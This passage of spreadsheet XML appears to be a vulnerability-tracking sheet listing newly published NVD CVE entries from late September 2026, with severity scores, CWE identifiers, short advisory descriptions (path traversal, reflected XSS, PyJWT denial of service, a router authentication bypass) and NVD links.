          <t>A vulnerability was identified in Thinkware U3000 up to 1.02.04. Affected is the function get_file of the file /tmp/wpa_supplicant.conf of the component TCP Service. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101054</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101070</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in dbgate up to 7.3.1. Affected by this vulnerability is the function files of the file packages/api/src/controllers/runners.js of the component Files Endpoint. The manipulation of the argument runid leads to path traversal. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101070</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101082</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in PMWeb 7.x/8.x/2025.x. This issue affects some unknown processing of the file downloader.aspx. This manipulation of the argument FullFileName/FileName causes path traversal. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101082</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101092</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.4 fails to enforce publish-access checks in the getCurrentAttrViewImages endpoint, allowing publish readers to retrieve image asset paths from unauthorized databases. Attackers can call the endpoint with an unrendered database identifier obtained through related endpoints to leak detached-row image asset paths and filenames that the rendering endpoint would deny.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101092</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101098</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in ag-ui-protocol ag-ui up to 2026-09-23. Affected by this issue is the function readAllBytes of the file JdkAgentHttpHandler.java of the component HTTP Handler. Such manipulation leads to resource consumption. The attack can be launched remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101098</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101101</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ag-ui-protocol ag-ui up to 2026-09-07. This issue affects the function JSON.parse of the file legacy/convert.ts of the component Middleware. The manipulation leads to uncaught exception. Remote exploitation of the attack is possible. Upgrading to version 2026-09-08 is capable of addressing this issue. The identifier of the patch is 30f8c794d5b73df5c610153043db502b2cc106cc. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101101</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101109</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Vehicle Manager (Free) &lt; 6.5.8 - The public vehicle-detail page (task=view) echoes the title request parameter directly into a double-quoted HTML attribute with no output encoding of any kind. A double-quote character in the parameter closes the attribute, allowing arbitrary markup, including a &lt;script&gt; tag, to be injected into the page.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101109</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101111</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Book Library (Free) &lt; 6.4.6 - The public book-detail page template, site/views/view_book/tmpl/default.php, echoes the raw title request parameter directly into a double-quoted HTML attribute with no escaping function of any kind (echo $_REQUEST["title"];). A value containing a double quote closes the attribute early and allows arbitrary HTML/JavaScript to follow.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101111</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.0.0a1 until 2.15.0, PyJWT PyJWKClient.get_signing_key_from_jwt is affected because payload parser catches ValueError but not RecursionError. This occurs when an attacker-controlled recursively nested payload reaches json.loads. As a result, documented PyJWT exception handling does not contain the failure. Consequently, an unauthenticated request can raise an exception that may produce an HTTP 500 response. The advisory-defined affected implementation also includes jwt/api_jwt.py, verify_signature=False. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102362</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to implement authentication controls on the DELETE /prodComm endpoint in ProdCommController. Unauthenticated attackers can delete arbitrary product reviews by supplying the prodCommId parameter without authorization checks.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102362</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18825</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>64c5ae8f-7972-4697-86a0-7ada793ac795</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>An Origin Validation Error in the middleware of the connect-xcors npm package allows an attacker to bypass origin verification and perform a cross domain authenticated request.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18825</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52749</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router improperly issues session cookies in responses to unauthenticated HTTP requests. This vulnerability allows a remote attacker to obtain a valid session identifier without providing credentials, resulting in an authentication bypass. With this access, the attacker can perform unauthorized actions on upgrade-related functionalities. These actions can be abused to force the router to issue GET requests to arbitrarily chosen domains.
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52749</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55156</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, the dashboard HTTP server in token-optimizer-mcp exposes /api/session-summary and /api/session-events with no authentication middleware — any network-accessible client can reach them without credentials. Both handlers concatenate the caller-supplied sessionId query parameter directly into a filesystem path via path.join, and Node.js normalizes .. segments at resolution time, allowing an unauthenticated attacker to read any .jsonl file reachable from the server's filesystem. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55156</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82932</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
